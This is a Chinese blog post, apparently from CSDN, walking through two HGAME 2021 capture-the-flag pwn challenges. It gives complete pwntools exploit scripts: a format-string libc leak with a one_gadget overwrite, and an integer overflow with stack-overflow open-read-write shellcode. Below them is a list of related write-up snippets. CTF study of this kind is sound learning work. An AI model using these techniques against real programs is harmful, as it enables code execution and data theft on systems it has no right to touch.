hgame week1 2021 pwn

最新推荐文章于 2023-02-07 21:33:36 发布
最新推荐文章于 2023-02-07 21:33:36 发布
阅读量344 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42689613/article/details/116066055
版权

目录

once

写这个题的时候发现了一个工具,可以修改题目加载的libc.so和ld.so文件
patchelf
注释掉的是本地环境下的情况

#!/usr/bin/env python2

#env1=ubuntu 16.04  native
#env2=ld-2.27.so  libc.2.27
from pwn import *

arch = "amd64"
filename = "once"

context(os="linux", arch=arch, log_level="debug")
content = 0

offset = 0
# elf
elf = ELF(filename)

# libc
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc=ELF("./libc-2.27.so")
main_libc=libc.symbols['__libc_start_main']
#ogg_libc=[0x45226,0x4527a,0xf0364,0xf1207]
ogg_libc=[0x4f3d5,0x4f432,0x10a41c]

def b(addr):
    bk = "b *$rebase" + str(addr)
    gdb.attach(io, bk)
    success("attach")


def main():
    global io

    if content == 0:
        io = process("./once")
    else:
        io = remote("")
    #leak
    io.recvuntil("It is your turn: ")
    payload = b'%13$p\n'  #6+7
    payload =payload.ljust(0x28,b'k')
    payload += b'\xd3'
    print(payload)
    #gdb.attach(io, 'b printf')
    io.send(payload)
    #count
    #main_addr=int(io.recv(14),16)-240
    main_addr=int(io.recv(14),16)-231
    print(hex(main_addr))
    libcbase=main_addr-main_libc
    ogg_addr=libcbase+ogg_libc[0]
    #flow
    payload=b'\x00'*(0x28)+p64(ogg_addr)
    io.recvuntil("It is your turn: ")
    io.send(payload)
    io.interactive()
main()

letter

seccomp禁用了一些系统调用(沙箱保护)所以即使整形溢出也无法通过system,onegadget来getshell

学到了一个工具seccomp-tools

所以这里需要用orw(open-read-write),题解是直接编写的shellcode。。。萌新太难了
我编不来,又看了其他师傅的wp,发现shellcraft可以更快的编出shellcode。
接下来三种思路
1.由于输入的lenth位置已知,把lenth最低的一个字节写为“jmp rsp”,就可以通过栈迁移,getshell了。
2.看了一些师傅是重新跳转到溢出的read函数将shellcode读到位置a,再跳转回a,具体的细节很神奇,我看不懂,枯了。还用ret2csu修改了rbp,伪造了栈帧?
3.其他的还可以利用gadget(pop rdi之类的),构造rop链,和2思路差不多,都是read shellcode到bss段,再跳转过去执行

#!/usr/bin/env python2
from pwn import *

arch = "amd64"
filename = "letter"

context(os="linux", arch=arch, log_level="debug")
content = 0

offset = 0
# elf
elf = ELF(filename)
jmp_addr=0x000000000060108C
# libc

def b(addr):
    bk = "b *$rebase" + str(addr)
    gdb.attach(io, bk)
    success("attach")

def main():
    global io
    if content == 0:
        io = process("./" + filename)
    else:
        io = remote("")
    #int_flow
    #io.sendlineafter('?\n',"-268376833")  #0xFFFFFFFF F000 E4FF
    #io.sendlineafter('?\n', "-16718593")  #0xFFFFFFFF FF00 E4FF
    #io.sendlineafter('?\n',"-989953")     #0xFFFFFFFF FFF0 E4FF
    io.sendlineafter('?\n',"-6913")        #0xFFFFFFFF FFFF E4FF
    #getshell
    shellcode = '''
    mov rax, 0x101010101010101
    push rax
    mov rax, 0x101010101010101 ^ 0x67616c66
    xor [rsp], rax
    mov rdi, rsp
    xor rsi, rsi
    xor rdx, rdx
    mov rax, 2
    syscall
    xor rax, rax
    mov rdi, 3
    mov rsi, 0x601070
    mov rdx, 0x100
    syscall
    mov rax, 1
    mov rdi, 1
    mov rsi, 0x601070
    mov rdx,0x100
    syscall'''

    orw_pay=shellcraft.open("./flag")
    orw_pay+=shellcraft.read(3,0x601070,0x50)
    orw_pay+=shellcraft.write(1,0x601070,0x50)
    payload = b'a' * (0x18) + p64(jmp_addr)
    payload +=asm(orw_pay)
    io.sendline(payload)
    io.recv()
    io.interactive()
main()
qingmu-z
关注
HGAME 2022 week1 个人部分WP
qazwsxeb的博客
02-10 3847
寒假期间,小萌新在家瞎搞CTF,也是第一次参加HGAME,整体来说题目是简单的,但对于我这个萌新菜鸟来说,还是一头雾水,只会做一些简单的密码题,week1的web和misc还能做出几题,后面几周就完全不会了,二进制完全看不懂。。。已经坐牢有一段时间了,想想还是不要浪费时间,记录下这次比赛,也是一种学习。 本人还是个萌新,WP可能会存在很多错误,望各位大佬勿喷,也请多多指正。 web Tetris plus 描述:据说没人能超过 3000 分。要是做题做累了,就来玩玩小游戏吧(x 这道题很明显是玩游
HGAME 2017 or 2018 PWN levels
qq_42192672的博客
11-12 952
这个算是做之前的复现吧,感谢Veritas501 WEEK1 1.flag server 拖进IDA看一下 流程倒着看,要有flag-----v8=1-----v5=v6-----s1=admin,我们可以把s1覆盖掉-----username长度不能大于63,不能等于0-----之后还要猜出随机数v6,看一下怎么覆盖 这些变量都在一起,美滋滋 exp from pwn...
Hgame 2021 week1 pwn刷题
qq_45595732的博客
02-06 1463
whitegive 签到 from pwn import* context.log_level = 'debug' p = remote('182.92.108.71',30210) p.sendlineafter(':',str(0x402012)) p.interactive() letter 开了沙箱,NX未开 orw思路,shellocde from pwn import* context.log_level = 'debug' libc = ELF('/lib/x86_64-linux-gnu/
hgame2021 week2 pwn刷题
qq_45595732的博客
02-14 442
rop_primary 矩阵相乘,算法分析用过numpy就直接调用numpy现有的库了,常规栈溢出,但是不知道为什么system的系统调用貌似被禁用了,所以用了orw,没拿shell from pwn import* import numpy as np from LibcSearcher import* context.log_level = 'debug' def pr(a,addr): log.success(a+'====>'+hex(addr)) elf = ELF('./rop_prim
hgame2021 week3 pwn刷题
qq_45595732的博客
02-21 425
blackgive 栈迁移 from pwn import* context.log_level = 'debug' def pr(a,addr): log.success(a+'====>'+hex(addr)) #p = process('./blackgive') p =remote('182.92.108.71',30459) elf = ELF('./blackgive') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') puts_plt =
hgame2019 week1 wp
qq_42192672的博客
02-02 935
这次新搭了gitpage+hexo的博客 wp第一次就放在上面啦 链接:https://woaixiaoyuyu.github.io/2019/01/30/hgame2019-week1-wp/#more
HGAME2021刷题补题记录(懒 暂时断更)
Npceer-一位网安初学者的博客
02-08 1941
HGAME2021之我真的是web入门选手吗?week1 (应该可以发了吧 我看了下 week1提交好像0分)web(纯fw就写了两题 会补的)什么什么顺风车那题合成大西瓜misc不起眼压缩包的养成方法(未解出 记录一下卡在哪)BASE全家福Galaxycryptoまひと(咒术回战那个)week2(时间没到 就不写了)cryptowhitegiversa week1 (应该可以发了吧 我看了下 week1提交好像0分) web(纯fw就写了两题 会补的) web入门居然web最垃圾 什么什么顺风车那题 进去
【WP】hgame2023 week4 Pwn
最新发布
woodwhale的博客
02-07 795
hgame2023 week4 Pwn
hgame2022re week1
m0_58348028的博客
02-04 1061
easyasm 16位的汇编, 附件在这里:链接:https://pan.baidu.com/s/12Sk92AvtXV0rzaRmiBoKFA 提取码:h0r1 ida pro打开 通过分析这张图,我们可以知道在1处进行对比后若正确则走3处直接输出,若没有比对成功就走2处,由此循环直到si==1Ch,所以我们只需要分析2处是怎么处理的 seg003:0000 public start seg003:0000 start ..
PWN-COMPETITION-HGAME2022-Week1
P1umH0的博客
01-28 1400
PWN-COMPETITION-HGAME2022Week1enter_the_pwn_landenter_the_evil_pwn_landoldfashion_orw(unsolved)ser_per_fa(unsol)test_your_nctest_your_gdb Week1 enter_the_pwn_land 栈溢出,需要注意的是下标 i 的地址比输入s的地址更高 s溢出会覆盖 i ,于是需要小心地覆写 i 的值,让循环顺利执行下去 然后就是常规的ret2libc # -*- coding:
hgame 2022 PWN 部分题目 Writeup
02-18 3399
hgame 2022 pwn 部分题目writeup
CTF-PWN-babysc(Hgame)
SuperGate的博客
02-04 810
直接运行该程序,发现没有任何提示信息,随便输入一串字符之后,程序错误退出。 扔进ida查看: 程序用read函数读入buf,然后判断[rbp+var_4]和0x4f的大小关系。这里可以知道[rbp+var_4]应为循环变量,buf长度为80 然后对于buf[i] ,异或buf[i]^(i+1),最后将buf蕴含的指令赋值给rdx并执行。 我们可以考虑直接构造system(/bin/sh...
HGAME2021Week1 Writeup
m0_51357657的博客
02-07 1331
小白做完了re还是很开心的 RE部分 Day 1 helloRe 第一天的第一道题~~这道题是真.签到题啊 进入ida,没有明显的main函数,F12查找字符串,看到input flag点进去 发现主函数应该是sub_1400014C0 逻辑很简单,脚本也挺好写的 #include<iostream> using namespace std; int main() { char memory[30] = ""; int v6 = 0x0FF; char asc_[23] = "
2022 hgame pwn wp
weixin_45209963的博客
03-27 4988
2022 hgame pwn wp 本来早就写好了,但是由于复试毕设等等原因拖到今天才发 包括了绝大部分题目,除了算法题spfa和bpwn,剩下一些简单题懒得写了orz 文章目录2022 hgame pwn wpWeek 1enter_the_pwn_landenter_the_evil_pwn_landoldfashion_orwWeek 2oldfashion_noteechoWeek 3changeable_noteelder_notesized_noteWeek 4vector Week 1 ent
hgame2021 week1 writeup
TF0xn的博客
02-06 2809
目录WebHitchhiking_in_the_Galaxywatermelon宝藏走私者智商检测鸡走私者的愤怒MISCBase全家福不起眼压缩包的养成的方法GalaxyWord REMASTER Web Hitchhiking_in_the_Galaxy 访问页面,提示“我要搭顺风车!”,打开burpsuite抓包重放,提示405 将GET方法改为POST方法重放,提示“只有使用"无限非概率引擎"(Infinite Improbability Drive)才能访问这里~” 修改User-agent头为:I
HgameCTF(week1)-RE,PWN题解析
蚁景网安学院
02-06 429
##RE###maze这个题目从题目名上可以知道是一个迷宫题目,迷宫题目主要把握住迷宫地图,方向键还有起点终点就好。ida打开while ( (signed int)v4 < SH...
ret2dl_runtime_resolve(64位)
qq_45595732的博客
03-07 590
先把相关结构体和宏都列一下把(也懒得一个一个解释了) typedef struct { Elf64_Sxword d_tag; /* Dynamic entry type */ union { Elf64_Xword d_val; /* Integer value */ Elf64_Addr d_ptr; /* Address value */ } d_un; } Elf64_Dyn; typedef struct { Elf64_Word s
HGAME2021-week1-wp
qq_50438521的博客
02-07 5492
HGAME2021-week1-wp 1. Web_watermelon 链接:http://watermelon.ryen.xyz:800/ 本题是一个合成大西瓜的小游戏,过2000分拿到flag。 打开这个界面我人都是懵的,这是啥??下面的堆积的界面完全看不到,然后我就瞎子摸象,玩了不下五次,没有一次超过300分。真的!!!作为一个游戏黑洞,加上我从来没玩过它,让我不作弊是不可能的。 所以在火狐浏览器中找到web开发者,在查看器中更改界面,把红线提高,要让红线高就要让界面窄一点,深一点。 (如图所示)
虚拟机挑战解析:hgame-week4-easyvm与cg-ctf WxyVM
"虚拟机题目解析,包括hgame-week4-easyvm、cg-ctf wxyVM1/2,涉及虚拟机基础知识、数据处理及逆向工程" 虚拟机技术是计算机科学中的一个重要领域,它允许在单一硬件系统上运行多个操作系统实例。在网络安全和密码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值